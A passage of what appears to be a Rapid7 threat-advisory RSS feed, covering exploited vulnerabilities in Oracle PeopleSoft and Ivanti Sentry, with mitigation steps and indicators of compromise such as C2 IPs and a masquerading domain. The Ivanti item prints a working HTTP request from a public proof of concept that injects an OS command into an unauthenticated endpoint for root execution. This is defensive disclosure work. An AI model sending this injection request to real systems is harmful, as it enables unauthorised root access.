SonicWall’s recovery guidance.</span></p><h2>Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations should prioritize identifying all internet-facing SonicWall SMA1000 appliances and determine whether affected software versions remain deployed. Given SonicWall’s and Rapid7’s confirmation of active exploitation, exposed appliances should be considered high-priority assets for remediation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Security teams should also review available authentication, web access, and appliance management logs for the indicators published by SonicWall to determine whether follow-up incident response activities are warranted.</span></p><h3>Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers will be able to assess exposure to </span><span style='font-size: undefined;'><strong>CVE-2026-15409</strong></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><strong>CVE-2026-15410</strong></span><span style='font-size: undefined;'> with authenticated vulnerability checks available in the July 15 content release.</span></p><h2>Updates</h2><ul><li style="direction: ltr;"><span style='font-size: undefined;'><strong>July 15, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></li><li><span style='font-size: undefined;'><strong>July 16, 2026: </strong></span><span style='font-size: undefined;'>Additional IOCs identified and blog section updated with the identified attacker asset names.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410</link>
      <guid isPermaLink="false">bltfb1c918a8a50c247</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 15 Jul 2026 16:19:26 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Active Exploitation of Oracle PeopleSoft Zero-Day (CVE-2026-35273)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On June 10, 2026, Oracle published a </span><a href="https://www.oracle.com/security-alerts/alert-cve-2026-35273.html"><span style='font-size: undefined;'>security alert</span></a><span style='font-size: undefined;'> for </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-35273"><span style='font-size: undefined;'>CVE-2026-35273</span></a><span style='font-size: undefined;'>, a critical vulnerability in the Updates Environment Management component of PeopleSoft Enterprise PeopleTools. Oracle released an out-of-band patch the same day as the advisory, underscoring the urgency of remediation. The vulnerability has a CVSSv3.1 score of </span><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"><span style='font-size: undefined;'>9.8</span></a><span style='font-size: undefined;'> and is remotely exploitable without authentication. Per the vendor advisory, successful exploitation may result in remote code execution (RCE). TrendAI has </span><a href="https://success.trendmicro.com/en-US/solution/KA-0023679"><span style='font-size: undefined;'>classified</span></a><span style='font-size: undefined;'> the underlying flaw as a server-side request forgery (</span><a href="https://cwe.mitre.org/data/definitions/918.html"><span style='font-size: undefined;'>CWE-918</span></a><span style='font-size: undefined;'>). PeopleTools versions </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.61</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.62</span></span><span style='font-size: undefined;'> are affected.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-35273 was reported to Oracle through TrendAI's Zero Day Initiative. According to a </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit"><span style='font-size: undefined;'>report published by Mandiant</span></a><span style='font-size: undefined;'> on June 11, 2026,</span><span style='font-size: undefined;'><strong> this vulnerability has been exploited in the wild as a zero-day prior to the vendor security alert</strong></span><span style='font-size: undefined;'>, with active exploitation observed between May 27 and June 9, 2026, predating Oracle's advisory by two weeks. The vulnerability was added to the CISA KEV on June 12, 2026.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Mandiant has attributed the campaign to UNC6240 (ShinyHunters), a financially motivated cybercriminal collective known for data theft and extortion. ShinyHunters has been linked to breaches across cloud services, SaaS platforms, and telecommunications providers, frequently exploiting weak authentication controls, stolen credentials, and cloud misconfigurations rather than deploying sophisticated malware.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Based on information published by Mandiant, the campaign heavily targeted the higher education sector; 68 percent of the more than 100 notified organizations were universities and colleges. The observed exploitation targeted PeopleSoft's Environment Management Hub (PSEMHUB) endpoints, and data stolen during the campaign was published on the ShinyHunters Data Leak Site (DLS) on June 9, 2026.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span><span style='font-size: undefined;'> URI path appears in both the indicators of compromise for this campaign and in a PeopleSoft exploit chain for </span><a href="https://www.cve.org/CVERecord?id=CVE-2013-3821"><span style='font-size: undefined;'>CVE-2013-3821</span></a><span style='font-size: undefined;'>, </span><a href="https://blog.lexfo.fr/oracle-peoplesoft-xxe-to-rce.html"><span style='font-size: undefined;'>detailed by Lexfo in 2017</span></a><span style='font-size: undefined;'>. A related XML External Entity (XXE) vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2017-3548"><span style='font-size: undefined;'>CVE-2017-3548</span></a><span style='font-size: undefined;'>, targeted a different Integration Gateway connector (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>PeopleSoftServiceListeningConnector</span></span><span style='font-size: undefined;'>) under the same </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/</span></span><span style='font-size: undefined;'> path.</span></p><h2 style="direction: ltr;">Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>TrendAI's detection signatures for CVE-2026-35273 classify the underlying vulnerability as an SSRF. These include IPS Rule 1012580 ("Oracle Peoplesoft PeopleTools SSRF Vulnerability") and DDI Rule 5855 ("Peoplesoft PeopleTools Environment Management Hub (PSEMHUB) SSRF Exploit"). Mandiant describes CVE-2026-35273 as a critical remote code execution vulnerability, indicating that the SSRF serves as the mechanism through which code execution is achieved. Based on Mandiant's analysis, two endpoints are involved in exploitation: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSEMHUB/hub</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span><span style='font-size: undefined;'>. The exploit chain may also cause the target system to make outbound SMB connections (TCP port 445) to external destinations, potentially allowing attackers to capture Windows machine-account NetNTLM hashes.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Post-exploitation activity observed by Mandiant included the deployment of </span><a href="https://meshcentral.com/"><span style='font-size: undefined;'>MeshCentral</span></a><span style='font-size: undefined;'> (an open-source, and self-hosted web-based remote monitoring and management platform) remote management agents configured to masquerade as Microsoft Azure services (e.g., </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>meshagent64-azure-ops.exe</span></span><span style='font-size: undefined;'>), with C2 communications directed to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>wss://azurenetfiles[.]net:443/agent.ashx</span></span><span style='font-size: undefined;'>. The attackers performed internal reconnaissance of PeopleSoft configurations, deployed lateral movement scripts, and exfiltrated data using </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>zstd</span></span><span style='font-size: undefined;'> compression.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running PeopleTools versions </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.61</span></span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.62</span></span><span style='font-size: undefined;'> should apply the vendor-supplied </span><a href="https://support.oracle.com/support/?documentId=CPU187"><span style='font-size: undefined;'>patch</span></a><span style='font-size: undefined;'> on an emergency basis, without waiting for a regular patch cycle to occur. Oracle has characterized this as a high-priority risk reduction measure.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition to patching, organizations should implement the following compensating controls:</span></p><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Disable the Environment Management Hub (EMHub) Service</strong></span><span style='font-size: undefined;'> in multi-server configurations, or completely remove the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>PSEMHUB</span></span><span style='font-size: undefined;'> application in single-server configurations.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Block external access</strong></span><span style='font-size: undefined;'> to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSEMHUB/*</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span><span style='font-size: undefined;'> at the network perimeter or firewall level. Per Mandiant, restricting these endpoints is considered non-breaking for standard end-user PeopleSoft Internet Architecture (PIA) browser sessions.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Monitor outbound SMB traffic</strong></span><span style='font-size: undefined;'> (TCP port 445) from PeopleSoft servers to untrusted external destinations.</span></p></li></ul><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Given that exploitation occurred as early as May 27, 2026, Rapid7 strongly recommends investigating for signs of compromise even after patching, using the indicators of compromise outlined below.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a href="https://www.oracle.com/security-alerts/alert-cve-2026-35273.html"><span style='font-size: undefined;'>Oracle security alert</span></a><span style='font-size: undefined;'> and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit"><span style='font-size: undefined;'>Mandiant's report</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to</span><a href="https://www.oracle.com/security-alerts/alert-cve-2026-35273.html"><span style='font-size: undefined;'> CVE-2026-35273</span></a><span style='font-size: undefined;'> with authenticated</span><span style='font-size: undefined;'><strong> </strong></span><span style='font-size: undefined;'>vulnerability checks available in the 12th June 2026 content release.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Intelligence Hub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers leveraging Rapid7's Intelligence Hub can track the latest developments surrounding CVE-2026-35273, including indicators of compromise (IOCs) from the Mandiant report published on June 11, 2026.</span></p><h2 style="direction: ltr;">Indicators of compromise</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following indicators of compromise are sourced from </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit"><span style='font-size: undefined;'>Mandiant's report</span></a><span style='font-size: undefined;'>. Mandiant has also published a </span><a href="https://www.virustotal.com/gui/collection/50ac0ffbc9ecf4559949faa026a412c9bb57e81d3ae0714a4dcd25b4fec35105"><span style='font-size: undefined;'>GTI collection</span></a><span style='font-size: undefined;'> with additional IOCs for registered users.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Network indicators</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Staging and C2 infrastructure:</strong></span></p><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]186</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]187</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]188</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]189</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>142.11.200[.]190</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>azurenetfiles[.]net (C2 domain masquerading as Microsoft Azure)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>176.120.22[.]24 (ShinyHunters DLS mirror)</span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>File indicators</span></h3><table><colgroup data-width='750'><col style="width:32.21153846153846%"/><col style="width:28.525641025641026%"/><col style="width:39.26282051282052%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Filename</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>SHA-256</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>meshagent64-azure-ops.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Pre-configured Windows MeshCentral agent</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>f02a924c9ff92a8780ce812511341182c6b509d45bc59f3f7b522e37225d24fc</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>meshagent64-v2.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Pre-configured Windows MeshCentral agent</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>d83fdb9e53c5ff03c4cb0451ea1bebd79b53f29eadc1e2fa394c7af13a86ce2f</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>meshagent32-azure-ops.exe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Pre-configured Windows MeshCentral agent (32-bit)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>c7e9332731b06644fc73e0046a2a89eaa59b09f54250e9bd622467187351711f</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>meshagent</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Unconfigured Linux MeshCentral agent</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>.bash_history</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker command history</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>2ab684d93c1553fad87041b4dea97188a97e78589deee2a7bacff905564f3a35</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Host-based indicators</span></h3><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Unexpected </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.jsp</span></span><span style='font-size: undefined;'> files under </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;PS_CFG_HOME&gt;/webserv/&lt;domain&gt;/applications/peoplesoft/PSEMHUB.war/</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Unauthorized files or directories under </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.../PSEMHUB.war/envmetadata/transactions/</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Unexpected directories named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>logs</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>persistantstorage</span></span><span style='font-size: undefined;'>, or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>scratchpad</span></span><span style='font-size: undefined;'> under PSEMHUB paths</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Recently created or modified </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.xml</span></span><span style='font-size: undefined;'> files under </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;docroot&gt;/envmetadata/data/environment/</span></span><span style='font-size: undefined;'> (potential XMLDecoder persistence)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Defacement and extortion marker file: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT</span></span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Log-based indicators</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>HTTP </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>POST</span></span><span style='font-size: undefined;'> requests to the following endpoints from external source IPs:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSEMHUB/hub</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Requests to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/PSIGW/HttpListeningConnector</span></span><span style='font-size: undefined;'> containing loopback addresses (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>127.0.0.1</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>localhost</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>::1</span></span><span style='font-size: undefined;'>) or internal IP ranges within request headers or parameters may indicate SSRF exploitation.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 12, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></p></li><li><span style='font-size: undefined;'><strong>June 12, 2026</strong></span><span style='font-size: undefined;'>: CVE added to CISA KEV.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-active-exploitation-of-oracle-peoplesoft-zero-day-cve-2026-35273</link>
      <guid isPermaLink="false">blt711647ad1a2d072d</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Jonah Burgess]]></dc:creator>
      <pubDate>Fri, 12 Jun 2026 13:43:04 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-10520, CVE-2026-10523 - Multiple critical vulnerabilities affecting Ivanti Sentry]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On June 9, 2026, Ivanti </span><a href="https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US"><span style='font-size: undefined;'>published a security advisory</span></a><span style='font-size: undefined;'> for two critical vulnerabilities affecting </span><a href="https://www.ivanti.com/products/secure-connectivity/sentry"><span style='font-size: undefined;'>Ivanti Sentry</span></a><span style='font-size: undefined;'> (formerly known as MobileIron Sentry), which per the vendor website is an “in-line gateway that manages, encrypts, and secures traffic between the mobile device and back-end enterprise systems”. The most severe issue, </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-10520"><span style='font-size: undefined;'>CVE-2026-10520</span></a><span style='font-size: undefined;'>, is an OS command injection vulnerability with a CVSS score of 10.0 that allows a remote unauthenticated attacker to achieve remote code execution (RCE) with root privileges. The second vulnerability, </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-10523"><span style='font-size: undefined;'>CVE-2026-10523</span></a><span style='font-size: undefined;'>, is an authentication bypass vulnerability with a CVSS score of 9.9 that allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access. Ivanti has stated that they are not aware of any customers being exploited by either of these vulnerabilities at the time of disclosure. </span></p><table><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3.1</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CWE</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2026-10520"><span style='font-size: undefined;'>CVE-2026-10520</span></a></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"><span style='font-size: undefined;'>10.0 (Critical)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>OS Command Injection (</span><a href="https://cwe.mitre.org/data/definitions/78.html"><span style='font-size: undefined;'>CWE-78</span></a><span style='font-size: undefined;'>)</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://www.cve.org/CVERecord?id=CVE-2026-10523"><span style='font-size: undefined;'>CVE-2026-10523</span></a></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"><span style='font-size: undefined;'>9.9 (Critical)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Authentication Bypass Using an Alternate Path or Channel (</span><a href="https://cwe.mitre.org/data/definitions/288.html"><span style='font-size: undefined;'>CWE-288</span></a><span style='font-size: undefined;'>)</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'>On June 10, 2026, watchTowr published a </span><a href="https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> of CVE-2026-10520 that includes a proof-of-concept (PoC) exploit for unauthenticated RCE. Given the trivial nature of exploitation and the availability of a public PoC, exploitation in-the-wild is likely to begin. Ivanti Sentry has featured on the CISA KEV list </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search=ivanti%2Csentry&amp;field_date_added_wrapper=all&amp;field_cve=&amp;sort_by=field_date_added&amp;items_per_page=20&amp;url="><span style='font-size: undefined;'>twice</span></a><span style='font-size: undefined;'> in the past (for the vulnerabilities CVE-2023-38035 and CVE-2020-15505), so we know threat actors will likely target this product. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On June 11, 2026, CVE-2026-10520 was </span><a href="https://www.cisa.gov/news-events/alerts/2026/06/11/cisa-adds-one-known-exploited-vulnerability-catalog"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation. With active exploitation now occurring, organizations running affected versions of Ivanti Sentry should remediate these issues on an urgent basis, outside of normal patching cycles.</span></p><h2 style="direction: ltr;">Technical overview for CVE-2026-10520</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Based upon the </span><a href="https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> by watchTowr, CVE-2026-10520 resides in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ConfigServiceController</span></span><span style='font-size: undefined;'> class within the Sentry web application, which is accessible via a POST request to the unauthenticated endpoint </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/mics/api/v2/sentry/mics-config/handleMessage</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>handleMessage</span></span><span style='font-size: undefined;'> endpoint accepts an attacker supplied </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>message</span></span><span style='font-size: undefined;'> parameter that is parsed as an internal configuration command. This ultimately results in arbitrary OS command execution as root with an attacker control OS command. Shown below is an example HTTP request generated by the </span><a href="https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523"><span style='font-size: undefined;'>public PoC</span></a><span style='font-size: undefined;'> to execute the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>id</span><span style='font-size: undefined;'> command on an affected system:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="html">POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: [redacted]
User-Agent: python-requests/2.33.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3C%2Freqandres%3E%3C%2Fcommandexec%3E</pre><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>A vendor-supplied update is available to remediate both CVE-2026-10520 and CVE-2026-10523. The following versions of Ivanti Sentry are affected:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.7.0</span></span><span style='font-size: undefined;'> and below</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.6.1</span></span><span style='font-size: undefined;'> and below</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.5.1</span></span><span style='font-size: undefined;'> and below</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The following fixed versions of Ivanti Sentry remediate both vulnerabilities:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.7.1</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.6.2</span></span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Ivanti Sentry </span><span style='font-size: undefined;'><span data-type='inlineCode'>10.5.2</span></span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Given the critical severity of these vulnerabilities, the availability of a public PoC exploit for CVE-2026-10520, and the unauthenticated attack vector, Rapid7 strongly recommends updating affected Ivanti Sentry appliances on an urgent basis, outside of normal patching cycles.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a href="https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US"><span style='font-size: undefined;'>vendor's security advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-10520 and CVE-2026-10523 with unauthenticated vulnerability checks available in the June 11 content release.</span></p><h2>Updates</h2><ul><li><span style='font-size: undefined;'><strong>June 10, 2026:</strong></span><span style='font-size: undefined;'> Initial publication.</span></li><li><span style='font-size: undefined;'><strong>June 11, 2026: </strong></span><span style='font-size: undefined;'>Updated to reflect availability of vulnerability checks.</span></li><li><span style='font-size: undefined;'><strong>June 12, 2026: </strong></span><span style='font-size: undefined;'>Updated Overview to add new CISA KEV reference.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-10520-cve-2026-10523-multiple-critical-vulnerabilities-affecting-ivanti-sentry</link>
      <guid isPermaLink="false">blt0bd95f53fd2cf179</guid>
      <category><![CDATA[Emergent Threat Response]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 10 Jun 2026 10:21:07 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Critical Check Point VPN Zero-Day Exploited in the Wild (CVE-2026-50751)]]></title>
